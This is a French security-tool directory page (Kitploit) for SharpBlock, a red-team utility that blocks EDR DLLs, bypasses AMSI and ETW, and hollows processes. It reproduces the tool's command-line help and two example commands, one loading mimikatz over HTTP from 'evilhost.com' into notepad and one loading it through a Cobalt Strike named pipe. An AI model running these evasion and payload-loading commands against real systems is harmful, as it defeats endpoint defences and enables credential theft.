Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharpBlock — Une méthode pour contourner les DLL de projection active des EDR en empêchant l'exécution du point d'entrée. | Kitploit
Outils/GitHubGitHub/ccob/sharpblock
Red Teaming
GitHubccob/sharpblock

SharpBlock

Une méthode pour contourner les DLL de projection active des EDR en empêchant l'exécution du point d'entrée.

Voir le dépôt
1.2k165il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SharpBlock

Une méthode pour contourner les DLL de projection active des EDR en empêchant l'exécution du point d'entrée.

Fonctionnalités

  • Bloque l'exécution du point d'entrée des DLL EDR, ce qui empêche la mise en place de hooks EDR.
  • Contournement AMSI sans patch, indétectable par les scanners qui recherchent des modifications de code d'Amsi.dll au moment de l'exécution.
  • Processus hôte qui est remplacé par un PE implanté pouvant être chargé depuis le disque, HTTP ou un tube nommé (Cobalt Strike)
  • Le processus implanté est caché pour aider à contourner les scanners qui recherchent des processus creusés.
  • Les arguments de ligne de commande sont usurpés et implantés après la création du processus en utilisant une méthode furtive de détection EDR.
  • Contournement ETW sans patch.
  • Bloque l'invocation de NtProtectVirtualMemory lorsque l'appelant se trouve dans la plage d'adresses d'une DLL bloquée.
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Exemples

Lancer mimikatz via HTTP en utilisant notepad comme processus hôte, en bloquant la DLL de SylantStrike

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Lancer mimikatz en utilisant un beacon Cobalt Strike via un tube nommé avec notepad comme processus hôte, en bloquant la DLL de SylantStrike

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Remarque : pour la commande beacon upload_file, chargez upload.cna dans le Script Manager de Cobalt Strike

Articles de blog associés :

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
Télécharger l’outil